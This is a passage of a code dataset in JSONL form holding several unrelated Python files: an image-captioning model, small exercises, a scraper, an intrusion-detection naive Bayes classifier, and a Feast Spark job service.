load_json('data/images_captions_train.json')\nprint(dataset['images'][0])\nprint(dataset.keys())\nprint(dataset['annotations'][0])\nshow_random_image_with_caption(dataset)\n\n# building vocab \nDATA_DIR = 'data'\ncaptions_filename = f'{DATA_DIR}/fa_captions.txt'\nvocab_filename = f'{DATA_DIR}/vocab.pkl'\n\nif os.path.exists(vocab_filename):\n vocab = pickle.load(open(vocab_filename, 'rb'))\nelse:\n vocab = build_vocab(captions_filename, min_count=3)\n pickle.dump(vocab, open(vocab_filename, 'wb'))\n\nfor i in range(20):\n print(\"%s --> %d\" %(vocab.idx2word[i], i))\n\n\nimages_dir = f'{DATA_DIR}/images'\ncaptions_json = f'{DATA_DIR}/fa_images_captions_train.json'\nimage_size = 256\ncrop_size = 224\nbatch_size = 16\n\n\ntransform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.RandomCrop(crop_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\n])\n\ndata_loader = get_loader(images_dir, captions_json, vocab, \n transform, batch_size, \n shuffle=True, num_workers=0)\n\nimgs, caps, lengths = next(iter(data_loader))\n\nprint(\" \".join([str(id) for id in caps[0][1:-1]]))\nprint(\" \".join([vocab.idx2word[id] for id in caps[0][1:-1]]))\n\nprint(caps.size())\n#-----------------------------------------------------\n#Encoder (CNN)\n#----------------------------------------------------\n\nclass EncoderCNN(nn.Module):\n def __init__(self, model_name, embed_size):\n super(EncoderCNN, self).__init__()\n \n # load cnn and remove last layer\n cnn = load_cnn_model(model_name)\n modules = list(cnn.children())[:-1] # remove last layer\n \n self.cnn = nn.Sequential(*modules)\n self.linear = nn.Linear(cnn.fc.in_features, embed_size)\n self.bn = nn.BatchNorm1d(embed_size, momentum=0.01)\n self.init_weights()\n \n def init_weights(self):\n self.linear.weight.data.normal_(0, 0.02)\n self.linear.bias.data.fill_(0)\n \n def forward(self, x):\n x = self.cnn(x) # extract features from input image\n x = Variable(x.data)\n x = x.view(x.size(0), -1)\n x = self.linear(x)\n x = self.bn(x)\n return x\n \n def fine_tune(self, requires_grad=True):\n for param in self.cnn.layer4.parameters():\n param.requires_grad = requires_grad\n#-------------------------------------------------------------\n#Decoder (LSTM)\n#-------------------------------------------------------------\n\nclass DecoderLSTM(nn.Module):\n def __init__(self, vocab_size, embed_size, hidden_size, num_layers, dropout, tie_weights):\n super(DecoderLSTM, self).__init__()\n \n if tie_weights:\n embed_size = hidden_size\n \n self.embedding = nn.Embedding(vocab_size, embed_size)\n self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first=True, dropout=0.35)\n self.fc = nn.Linear(hidden_size, vocab_size)\n self.dropout = nn.Dropout(p=dropout)\n \n if tie_weights:\n # share weights between embedding and classification layer\n self.fc.weight = self.embedding.weight\n \n self.init_weights()\n \n def init_weights(self):\n self.embedding.weight.data.uniform_(-0.1, 0.1)\n self.fc.weight.data.uniform_(-0.1, 0.1)\n self.fc.bias.data.fill_(0)\n \n def forward(self, features, captions, lengths):\n x = self.embedding(captions)\n x = torch.cat([features.unsqueeze(1), x], dim=1)\n x = self.dropout(x)\n x = pack_padded_sequence(x, lengths, batch_first=True)\n x, _ = self.lstm(x)\n x = self.dropout(x[0])\n x = self.fc(x)\n return x\n \n def sample(self, features, states=None):\n \"\"\"Samples captions for given image features (Greedy search).\"\"\"\n sampled_ids = []\n inputs = features.unsqueeze(1)\n\n for i in range(20): # maximum sampling length\n hiddens, states = self.lstm(inputs, states) # (batch_size, 1, hidden_size), \n outputs = self.fc(hiddens.squeeze(1)) # (batch_size, vocab_size)\n token_id = outputs.max(1)[1]\n sampled_ids += [token_id]\n inputs = self.embedding(token_id)\n inputs = inputs.unsqueeze(1) # (batch_size, 1, embed_size)\n sampled_ids = torch.cat(sampled_ids, 0) # (batch_size, 20)\n return sampled_ids.squeeze()\n\n#-----------------------------------------------\n# Encoder-Decoder\n#-----------------------------------------------\n\nclass EncoderDecoder(nn.Module):\n \n def __init__(self, cnn_name, vocab_size, embed_size, hidden_size, num_layers, dropout, tie_weights):\n super(EncoderDecoder, self).__init__()\n \n if tie_weights:\n embed_size = hidden_size\n \n self.encoder = EncoderCNN(cnn_name, embed_size)\n self.decoder = DecoderLSTM(vocab_size, embed_size, hidden_size, num_layers, dropout, tie_weights)\n \n # create output folder to save weights\n self.save_path = f'{cnn_name}-{embed_size}-{hidden_size}-{num_layers}'\n if not os.path.exists(self.save_path):\n os.mkdir(self.save_path)\n \n def forward(self, images, captions, lengths):\n features = self.encoder(images)\n outputs = self.decoder(features, captions, lengths)\n return outputs\n \n def save(self, epoch, loss):\n torch.save({'encoder': self.encoder.state_dict(), \n 'decoder': self.decoder.state_dict()}, f'{self.save_path}/{epoch}-{loss:.2f}.pth')\n \n def load(self, epoch):\n model_path = glob(f'{self.save_path}/{epoch}-*.pth')[-1]\n try:\n d = torch.load(model_path)\n self.encoder.load_state_dict(d['encoder'])\n self.decoder.load_state_dict(d['decoder'])\n except:\n print('Invalid epoch number <{}>, the model does not exist!'.format(epoch))\n\n# model hyper-parameters\ncnn_name = 'resnet50'\nembed_size = 512\nhidden_size = 512\nnum_layers = 2\ntie_weights = True\n\n# training hyper-parameters\nstart_epoch = 0\nnum_epochs = 20\nlearning_rate = 0.001\n\n# training\ndef train_epoch(model, train_dl, criterion, optimizer, scheduler, epoch, last_epoch):\n model.encoder.train()\n model.decoder.train()\n scheduler.step()\n \n total_steps = len(train_dl)\n epoch_loss = 0.0\n \n for i, (images, captions, lengths) in enumerate(train_dl):\n images, captions = to_var(images), to_var(captions)\n targets = pack_padded_sequence(captions, lengths, batch_first=True)[0]\n \n # forward step\n outputs = model(images, captions, lengths)\n loss = criterion(outputs, targets)\n epoch_loss = (epoch_loss * i + loss.data[0]) / (i + 1)\n \n # backward step\n model.encoder.zero_grad()\n model.decoder.zero_grad()\n \n loss.backward()\n torch.nn.utils.clip_grad_norm(model.decoder.parameters(), 5.0)\n optimizer.step()\n \n # report log info\n sys.stdout.flush()\n sys.stdout.write('\\rEpoch [%2d/%2d], Step [%3d/%3d], Loss = %.4f, Perplexity = %.4f '\n % (epoch+1, last_epoch, i+1, total_steps, epoch_loss, np.exp(epoch_loss)))\n print()\n\n return epoch_loss\n\n\ndef train(model, train_dl, criterion, optimizer, scheduler, start_epoch=0, num_epochs=10):\n last_epoch = start_epoch + num_epochs\n \n for epoch in range(start_epoch, last_epoch): \n # train step\n trn_loss = train_epoch(model, data_loader, criterion, optimizer, scheduler, epoch, last_epoch)\n \n # save model\n model.save(epoch, trn_loss)\n#------------------------------------------------------\n#Encoder-Decoder\n#------------------------------------------------------\nmodel = EncoderDecoder(cnn_name, len(vocab), embed_size, hidden_size, num_layers, 0.3, tie_weights)\nif use_gpu:\n model = model.cuda()\n\n# Loss and optimizer\n\n# loss function\ncriterion = nn.CrossEntropyLoss()\nif use_gpu:\n criterion = criterion.cuda()\n \n# list of parameters which will be updated\nparams = list(model.decoder.parameters())\nparams += list(model.encoder.linear.parameters()) \nparams += list(model.encoder.bn.parameters())\n\n# optimizer\noptimizer = torch.optim.RMSprop(params, lr=learning_rate)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.97)\n\n# Training \ntrain(model, data_loader, criterion, optimizer, scheduler, start_epoch, num_epochs)\n\nfrom PIL import Image\n\nval_transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(crop_size),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\n])\n\ndef generate_caption(model, img_filenames):\n model.encoder.eval()\n model.decoder.eval()\n \n captions = []\n \n for img_filename in img_filenames:\n\n # prepare test image\n image = load_image(img_filename, val_transform)\n image_tensor = to_var(image, volatile=True)\n\n # Generate features from image\n feature = model.encoder(image_tensor)\n\n # Generate caption from image\n sampled_ids = model.decoder.sample(feature)\n sampled_ids = sampled_ids.cpu().data.numpy()\n\n # decode word ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n word = vocab.idx2word[word_id]\n if word == '': break\n sampled_caption.append(word)\n\n caption = \" \".join(sampled_caption[1:])\n captions.append((img_filename, caption))\n \n return captions\n\nimg_filenames = glob('data/images/*.jpg')[:10]\ncaptions = generate_caption(model, img_filenames)\n\nfor img, caption in captions:\n display(show_persian_image_and_caption(caption, img))\n\nimg_filenames = glob('./data/im2txt/*.jpg')[:10]\ncaptions = generate_caption(model, img_filenames)\n\nfor img, caption in captions:\n display(show_persian_image_and_caption(caption, img)) \t\n\n\t\n\n","repo_name":"Foroozani/Deep-Neural-Nets","sub_path":"img_caption_Farsi.py","file_name":"img_caption_Farsi.py","file_ext":"py","file_size_in_byte":11534,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"35194650258","text":"NOTE_DATA = {\n 1 : 'George Washington',\n 2 : 'Thomas Jefferson',\n 5 : 'Abraham Lincoln',\n 10 : 'Alexander Hamilton',\n 20 : 'Andrew Jackson',\n 50 : 'Ulysses S. Grant',\n 100 : 'Benjamin Franklin',\n}\n\nnote = int(input('Please input a US note that EXISTS: $'))\nif note in NOTE_DATA:\n print(f'The US note ${note} has the face of {NOTE_DATA[note]} printed on the note!')\nelse:\n raise TypeError('haha this is what happens if you don\\'t read the instructions')","repo_name":"DGTV11/LCCL-PS-1-to-PS-6","sub_path":"PS 2/ex043.py","file_name":"ex043.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73666188527","text":"\"\"\"\nThis is a pure Python implementation of the heap sort algorithm.\n\n\"\"\"\n\n\ndef heapify(arr, heap_size, i):\n largest = i\n left = 2*i + 1\n right = 2*i + 2\n\n if left < heap_size and arr[largest] < arr[left]:\n largest = left\n if right < heap_size and arr[largest] < arr[right]:\n largest = right\n if largest != i:\n arr[i], arr[largest] = arr[largest], arr[i]\n heapify(arr, heap_size, largest)\n\n\ndef heap_sort(arr):\n a = len(arr)\n\n for i in range(int(a/2 - 1), -1, -1):\n heapify(arr, a, i)\n for i in range(a-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n heapify(arr, i, 0)\n return arr\n\n\nif __name__ == \"__main__\":\n unsort_array = [1, 4, 7, 2, 1, 3, 2, 5, 4, 2]\n unsort_array2 = [8, 7, 6, 5, 4, 3, 2, 1]\n print(heap_sort(unsort_array))\n print(heap_sort(unsort_array2))\n","repo_name":"Jameswayd/2022-algorithm-homework","sub_path":"Sort/heap_sort_ex.py","file_name":"heap_sort_ex.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25657419347","text":"# 트리의 부모 찾기: 실버2\n\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(1000000)\n\ndef recur(node):\n for nxt in tree[node]:\n if parent[nxt] == 0:\n parent[nxt] = node \n recur(nxt)\n\n\nn = int(input())\nparent = [0 for _ in range(n + 1)]\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n a, b = map(int, input().split())\n tree[a].append(b)\n tree[b].append(a)\n\nrecur(1)\nfor i in parent[2:]:\n print(i)\n","repo_name":"hany0147/TWIL","sub_path":"Algorithm/Tree/11725.py","file_name":"11725.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30121546982","text":"import re\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\n\nimport requests\n\n\nsession = requests.Session()\n\n\ndef main():\n \"\"\"\n クローラーのメイン処理,画像を保存\n \"\"\"\n # ゆるキャラグランプリの HP\n url = \"http://www.yurugp.jp/\"\n\n r = session.get(url)\n soup = BeautifulSoup(r.text, 'lxml')\n # 2011~2018 年のランキングの url を抽出\n links = soup.find_all('a', href=re.compile(\n r'http://www.yurugp.jp/ranking/\\?year=20\\d{2}'))\n img_urls = rank_year(links)\n\n for img_url in img_urls:\n img_url = img_url.get('href')\n img_url_join = urljoin('http://www.yurugp.jp/', url)\n s = get_img_url(img_url_join)\n response = requests.get(s['src'])\n with open('img/' + s['src'].split('/')[-1], 'wb') as file:\n file.write(response.content)\n\n\ndef rank_year(links):\n \"\"\"\n ランキングページから画像の url を抽出する\n \"\"\"\n session = requests.Session()\n\n for link in links:\n link = link.get('href')\n r = session.get(link)\n soup = BeautifulSoup(r.text, 'lxml')\n rank_links = soup.find_all(\n 'option', value=re.compile(r'rank=\\d+_\\d{3}&year=20\\d{2}'))\n rank_links_unique = list(set(rank_links)) # 重複を削除\n\n for rank_link in rank_links_unique:\n response = session.get(\n 'http://www.yurugp.jp/ranking/' + str(rank_link))\n img_soup = BeautifulSoup(response.text, 'lxml')\n img_urls = img_soup.find_all('a', href=re.compile(\n r'../character/detail.php\\?id=\\d{8}'))\n\n return img_urls\n\n\ndef get_img_url(link):\n \"\"\"\n ゆるキャラ個別のページから画像のソースを抽出\n \"\"\"\n img_r = requests.get(link)\n soup = BeautifulSoup(img_r.text, 'lxml')\n img_url = soup.find('img', src=re.compile(\n r'^http://www.yurugp.jp/img/uploads/character/650/\\d{8}.jpg'))\n\n return img_url\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hyhy-poemer/yuruchara_scraping","sub_path":"yuruchara_scaping.py","file_name":"yuruchara_scaping.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11908614330","text":"#!/usr/bin/env python\n\n__author__ = 'mnowotka'\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nimport json\nfrom bottle import run\nfrom optparse import OptionParser\nfrom beaker import app, config, loadPlugins, loadApps\n\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef main(conf_path=None):\n\n standalone = False\n\n if conf_path:\n config.load_config(conf_path)\n else:\n standalone = True\n parser = OptionParser()\n parser.add_option(\"-p\", \"--config_path\", dest=\"config_path\", help=\"path to config file\", default=\"beaker.conf\")\n (options, args) = parser.parse_args()\n conf_path = options.config_path\n config.load_config(conf_path)\n\n apps = json.loads(config.get('installed_apps', '[]'))\n plugins = json.loads(config.get('plugins', '[]'))\n\n loadApps(apps)\n loadPlugins(app, plugins)\n\n server = config.get('server_middleware', 'tornado')\n kwargs = {}\n if server == 'gunicorn':\n try:\n kwargs['workers'] = int(config.get('workers', '4'))\n except Exception as e:\n print(e)\n kwargs['workers'] = 4\n\n if standalone:\n run(app=app, host=config.get('bottle_host', 'localhost'), port=config.get('bottle_port', '8080'),\n debug=config.get('debug', True), server=server, **kwargs)\n else:\n return app\n\nif __name__ == \"__main__\":\n main()\n\nelse:\n apps = json.loads(config.get('installed_apps', '[]'))\n loadApps(apps)\n application = app\n\n# ----------------------------------------------------------------------------------------------------------------------\n","repo_name":"chembl/chembl_beaker","sub_path":"src/chembl_beaker/run_beaker.py","file_name":"run_beaker.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"2"} +{"seq_id":"28050534812","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nclass naiveBias:\n def calculate_prior(self, df, Y):\n classes = sorted(list(df[Y].unique()))\n prior = []\n for i in classes:\n prior.append(len(df[df[Y]==i])/len(df))\n return prior\n\n def calculate_likelihood_gaussian(self,df, feat_name, feat_val, Y, label):\n feat = list(df.columns)\n df = df[df[Y]==label]\n mean, std = df[feat_name].mean(), df[feat_name].std()\n p_x_given_y = (1 / (np.sqrt(2 * np.pi) * std)) * np.exp(-((feat_val-mean)**2 / (2 * std**2 )))\n return p_x_given_y\n\n def naive_bayes_gaussian(self,df, X, Y):\n # get feature names\n features = list(df.columns)[:-1]\n\n # calculate prior\n prior = self.calculate_prior(df, Y)\n\n Y_pred = []\n # loop over every data sample\n for x in X:\n # calculate likelihood\n labels = sorted(list(df[Y].unique()))\n likelihood = [1]*len(labels)\n for j in range(len(labels)):\n for i in range(len(features)):\n likelihood[j] *= self.calculate_likelihood_gaussian(df, features[i], x[i], Y, labels[j])\n\n # calculate posterior probability (numerator only)\n post_prob = [1]*len(labels)\n for j in range(len(labels)):\n post_prob[j] = likelihood[j] * prior[j]\n\n Y_pred.append(post_prob)\n\n return np.array(Y_pred) \n\n\n\n\n\n\nlocation = pd.read_csv(\"/Users/raghav/Documents/Programs/projects/ids_prediction/dataset/ids_dataset_updated.csv\")\n\ndataFrame = pd.DataFrame(location)\n\n\npredictors = dataFrame.iloc[:,:-1].values # Leave the last column alone\ntarget = dataFrame.iloc[:,-1].values # Select the last column alone\n\n\n# 80 train : 20 test\npredTrain, predTest, tarTrain, tarTest = train_test_split(\n predictors,\n target,\n train_size=0.8,\n test_size=0.2,\n shuffle=True)\n\n\ntestInput = [[4,349950,14844034,76099589,158473,2540,4,4,663067,662932]] # Normal \n#testInput = [[1,2990,67970025,63263334,4240,1906,5,1,13782,13662]] # BlackHole \n#testInput = [[1,1241,25263813,25832,188,236,4,1,3216,3106]] # Tcp Syn \n#testInput = [[3,744,12647232,31974078,126060,241,4,3,127492,127392]] # PortScan\n#testInput = [[2,4571,113552526,94919832,6236,2757,5,3,24500,24272]] # Diversion \nnb = naiveBias()\n\n\n\nnaiv = nb.naive_bayes_gaussian(dataFrame,testInput,Y=\"Label\")\n\nnaiv = naiv[0]\n\nfor i in naiv:\n print(i)\nprint(naiv)\n\nsums = sum(naiv)\n\n\nname = [\"Normal\",\"Block hole\",\"TCP SYN\",\"port scan\",\"Diversion\"]\nfor i in range(len(naiv)):\n temp = (naiv[i]/sums)*100\n print(f\"{name[i]} --- {temp:.2f}%\")\n\n","repo_name":"raghavtwenty/ids-prediction","sub_path":"code/_3_nb.py","file_name":"_3_nb.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70559681328","text":"import logging\nimport os\nimport signal\nimport threading\nimport time\nimport traceback\nfrom concurrent.futures import ThreadPoolExecutor\nfrom typing import Dict, List, Optional, Tuple, cast\n\nimport grpc\nfrom google.api_core.exceptions import FailedPrecondition\nfrom google.protobuf.timestamp_pb2 import Timestamp\n\nfrom feast import Client as FeastClient\nfrom feast import FeatureTable\nfrom feast.core import JobService_pb2_grpc as LegacyJobService_pb2_grpc\nfrom feast.data_source import DataSource\nfrom feast_spark import Client as Client\nfrom feast_spark.api import JobService_pb2_grpc\nfrom feast_spark.api.JobService_pb2 import (\n CancelJobResponse,\n GetHistoricalFeaturesRequest,\n GetHistoricalFeaturesResponse,\n GetJobResponse,\n)\nfrom feast_spark.api.JobService_pb2 import Job as JobProto\nfrom feast_spark.api.JobService_pb2 import (\n JobStatus,\n JobType,\n ListJobsResponse,\n ScheduleOfflineToOnlineIngestionJobRequest,\n ScheduleOfflineToOnlineIngestionJobResponse,\n StartOfflineToOnlineIngestionJobRequest,\n StartOfflineToOnlineIngestionJobResponse,\n StartStreamToOnlineIngestionJobRequest,\n StartStreamToOnlineIngestionJobResponse,\n UnscheduleOfflineToOnlineIngestionJobRequest,\n UnscheduleOfflineToOnlineIngestionJobResponse,\n)\nfrom feast_spark.constants import ConfigOptions as opt\nfrom feast_spark.pyspark.abc import (\n BatchIngestionJob,\n RetrievalJob,\n SparkJob,\n SparkJobStatus,\n StreamIngestionJob,\n)\nfrom feast_spark.pyspark.launcher import (\n get_job_by_id,\n get_stream_to_online_ingestion_params,\n list_jobs,\n schedule_offline_to_online_ingestion,\n start_historical_feature_retrieval_job,\n start_offline_to_online_ingestion,\n start_stream_to_online_ingestion,\n unschedule_offline_to_online_ingestion,\n)\nfrom feast_spark.third_party.grpc.health.v1.HealthService_pb2 import (\n HealthCheckResponse,\n ServingStatus,\n)\nfrom feast_spark.third_party.grpc.health.v1.HealthService_pb2_grpc import (\n HealthServicer,\n add_HealthServicer_to_server,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef _job_to_proto(spark_job: SparkJob) -> JobProto:\n job = JobProto()\n job.id = spark_job.get_id()\n job.log_uri = cast(str, spark_job.get_log_uri() or \"\")\n job.error_message = cast(str, spark_job.get_error_message() or \"\")\n status = spark_job.get_status()\n if status == SparkJobStatus.COMPLETED:\n job.status = JobStatus.JOB_STATUS_DONE\n elif status == SparkJobStatus.IN_PROGRESS:\n job.status = JobStatus.JOB_STATUS_RUNNING\n elif status == SparkJobStatus.FAILED:\n job.status = JobStatus.JOB_STATUS_ERROR\n elif status == SparkJobStatus.STARTING:\n job.status = JobStatus.JOB_STATUS_PENDING\n else:\n raise ValueError(f\"Invalid job status {status}\")\n\n if isinstance(spark_job, RetrievalJob):\n job.type = JobType.RETRIEVAL_JOB\n job.retrieval.output_location = spark_job.get_output_file_uri(block=False)\n elif isinstance(spark_job, BatchIngestionJob):\n job.type = JobType.BATCH_INGESTION_JOB\n job.batch_ingestion.table_name = spark_job.get_feature_table()\n elif isinstance(spark_job, StreamIngestionJob):\n job.type = JobType.STREAM_INGESTION_JOB\n job.stream_ingestion.table_name = spark_job.get_feature_table()\n else:\n raise ValueError(f\"Invalid job type {job}\")\n\n job.start_time.FromDatetime(spark_job.get_start_time())\n\n return job\n\n\nclass JobServiceServicer(JobService_pb2_grpc.JobServiceServicer):\n def __init__(self, client: Client):\n self.client = client\n\n @property\n def _whitelisted_projects(self) -> Optional[List[str]]:\n if self.client.config.exists(opt.WHITELISTED_PROJECTS):\n whitelisted_projects = self.client.config.get(opt.WHITELISTED_PROJECTS)\n return whitelisted_projects.split(\",\")\n return None\n\n def is_whitelisted(self, project: str):\n # Whitelisted projects not specified, allow all projects\n if not self._whitelisted_projects:\n return True\n return project in self._whitelisted_projects\n\n def StartOfflineToOnlineIngestionJob(\n self, request: StartOfflineToOnlineIngestionJobRequest, context\n ):\n \"\"\"Start job to ingest data from offline store into online store\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. Please contact your Feast administrator to whitelist it.\"\n )\n\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n job = start_offline_to_online_ingestion(\n client=self.client,\n project=request.project,\n feature_table=feature_table,\n start=request.start_date.ToDatetime(),\n end=request.end_date.ToDatetime(),\n )\n\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n\n return StartOfflineToOnlineIngestionJobResponse(\n id=job.get_id(),\n job_start_time=job_start_timestamp,\n table_name=request.table_name,\n log_uri=job.get_log_uri(), # type: ignore\n )\n\n def ScheduleOfflineToOnlineIngestionJob(\n self, request: ScheduleOfflineToOnlineIngestionJobRequest, context\n ):\n \"\"\"Schedule job to ingest data from offline store into online store periodically\"\"\"\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n schedule_offline_to_online_ingestion(\n client=self.client,\n project=request.project,\n feature_table=feature_table,\n ingestion_timespan=request.ingestion_timespan,\n cron_schedule=request.cron_schedule,\n )\n\n return ScheduleOfflineToOnlineIngestionJobResponse()\n\n def UnscheduleOfflineToOnlineIngestionJob(\n self, request: UnscheduleOfflineToOnlineIngestionJobRequest, context\n ):\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n unschedule_offline_to_online_ingestion(\n client=self.client, project=request.project, feature_table=feature_table,\n )\n return UnscheduleOfflineToOnlineIngestionJobResponse()\n\n def GetHistoricalFeatures(self, request: GetHistoricalFeaturesRequest, context):\n \"\"\"Produce a training dataset, return a job id that will provide a file reference\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. Please contact your Feast administrator to whitelist it.\"\n )\n\n job = start_historical_feature_retrieval_job(\n client=self.client,\n project=request.project,\n entity_source=DataSource.from_proto(request.entity_source),\n feature_tables=self.client._get_feature_tables_from_feature_refs(\n list(request.feature_refs), request.project\n ),\n output_format=request.output_format,\n output_path=request.output_location,\n )\n\n output_file_uri = job.get_output_file_uri(block=False)\n\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n\n return GetHistoricalFeaturesResponse(\n id=job.get_id(),\n output_file_uri=output_file_uri,\n job_start_time=job_start_timestamp,\n )\n\n def StartStreamToOnlineIngestionJob(\n self, request: StartStreamToOnlineIngestionJobRequest, context\n ):\n \"\"\"Start job to ingest data from stream into online store\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. Please contact your Feast administrator to whitelist it.\"\n )\n\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n\n if self.client.config.getboolean(opt.JOB_SERVICE_ENABLE_CONTROL_LOOP):\n # If the control loop is enabled, return existing stream ingestion job id instead of starting a new one\n params = get_stream_to_online_ingestion_params(\n self.client, request.project, feature_table, []\n )\n job_hash = params.get_job_hash()\n for job in list_jobs(include_terminated=True, client=self.client):\n if isinstance(job, StreamIngestionJob) and job.get_hash() == job_hash:\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n return StartStreamToOnlineIngestionJobResponse(\n id=job.get_id(),\n job_start_time=job_start_timestamp,\n table_name=job.get_feature_table(),\n log_uri=job.get_log_uri(), # type: ignore\n )\n raise RuntimeError(\n \"Feast Job Service has control loop enabled, \"\n \"but couldn't find the existing stream ingestion job for the given FeatureTable\"\n )\n\n # TODO: add extra_jars to request\n job = start_stream_to_online_ingestion(\n client=self.client,\n project=request.project,\n feature_table=feature_table,\n extra_jars=[],\n )\n\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n return StartStreamToOnlineIngestionJobResponse(\n id=job.get_id(),\n job_start_time=job_start_timestamp,\n table_name=request.table_name,\n log_uri=job.get_log_uri(), # type: ignore\n )\n\n def ListJobs(self, request, context):\n \"\"\"List all types of jobs\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. Please contact your Feast administrator to whitelist it.\"\n )\n\n jobs = list_jobs(\n include_terminated=request.include_terminated,\n project=request.project,\n table_name=request.table_name,\n client=self.client,\n )\n return ListJobsResponse(jobs=[_job_to_proto(job) for job in jobs])\n\n def CancelJob(self, request, context):\n \"\"\"Stop a single job\"\"\"\n job = get_job_by_id(request.job_id, client=self.client)\n job.cancel()\n return CancelJobResponse()\n\n def GetJob(self, request, context):\n \"\"\"Get details of a single job\"\"\"\n job = get_job_by_id(request.job_id, client=self.client)\n return GetJobResponse(job=_job_to_proto(job))\n\n\ndef start_control_loop() -> None:\n \"\"\"Starts control loop that continuously ensures that correct jobs are being run.\n\n Currently this affects only the stream ingestion jobs. Please refer to\n ensure_stream_ingestion_jobs for full documentation on how the check works.\n\n \"\"\"\n logger.info(\n \"Feast Job Service is starting a control loop in a background thread, \"\n \"which will ensure that stream ingestion jobs are successfully running.\"\n )\n try:\n feature_store = FeastClient()\n client = Client(feature_store)\n while True:\n ensure_stream_ingestion_jobs(client, all_projects=True)\n time.sleep(1)\n except Exception:\n traceback.print_exc()\n finally:\n # Send interrupt signal to the main thread to kill the server if control loop fails\n os.kill(os.getpid(), signal.SIGINT)\n\n\nclass HealthServicerImpl(HealthServicer):\n def Check(self, request, context):\n return HealthCheckResponse(status=ServingStatus.SERVING)\n\n\nclass LoggingInterceptor(grpc.ServerInterceptor):\n def intercept_service(self, continuation, handler_call_details):\n logger.info(handler_call_details)\n return continuation(handler_call_details)\n\n\ndef start_job_service() -> None:\n \"\"\"\n Start Feast Job Service\n \"\"\"\n feast_client = FeastClient()\n client = Client(feast_client)\n\n if client.config.getboolean(opt.JOB_SERVICE_ENABLE_CONTROL_LOOP):\n # Start the control loop thread only if it's enabled from configs\n thread = threading.Thread(target=start_control_loop, daemon=True)\n thread.start()\n\n server = grpc.server(ThreadPoolExecutor(), interceptors=(LoggingInterceptor(),))\n JobService_pb2_grpc.add_JobServiceServicer_to_server(\n JobServiceServicer(client), server\n )\n LegacyJobService_pb2_grpc.add_JobServiceServicer_to_server(\n JobServiceServicer(client), server\n )\n add_HealthServicer_to_server(HealthServicerImpl(), server)\n server.add_insecure_port(\"[::]:6568\")\n server.start()\n logger.info(\"Feast Job Service is listening on port :6568\")\n server.wait_for_termination()\n\n\ndef _get_expected_job_hash_to_tables(\n client: Client, projects: List[str]\n) -> Dict[str, Tuple[str, FeatureTable]]:\n \"\"\"\n Checks all feature tables for the requires project(s) and determines all required stream\n ingestion jobs from them. Outputs a map of the expected job_hash to a tuple of (project, table_name).\n\n Args:\n all_projects (bool): If true, runs the check for all project.\n Otherwise only checks the current project.\n\n Returns:\n Dict[str, Tuple[str, str]]: Map of job_hash -> (project, table_name) for expected stream ingestion jobs\n \"\"\"\n job_hash_to_table_refs = {}\n\n for project in projects:\n feature_tables = client.feature_store.list_feature_tables(project)\n for feature_table in feature_tables:\n if feature_table.stream_source is not None:\n params = get_stream_to_online_ingestion_params(\n client, project, feature_table, []\n )\n job_hash = params.get_job_hash()\n job_hash_to_table_refs[job_hash] = (project, feature_table)\n\n return job_hash_to_table_refs\n\n\ndef ensure_stream_ingestion_jobs(client: Client, all_projects: bool):\n \"\"\"Ensures all required stream ingestion jobs are running and cleans up the unnecessary jobs.\n\n More concretely, it will determine\n - which stream ingestion jobs are running\n - which stream ingestion jobs should be running\n And it'll do 2 kinds of operations\n - Cancel all running jobs that should not be running\n - Start all non-existent jobs that should be running\n\n Args:\n all_projects (bool): If true, runs the check for all project.\n Otherwise only checks the client's current project.\n \"\"\"\n\n projects = (\n client.feature_store.list_projects()\n if all_projects\n else 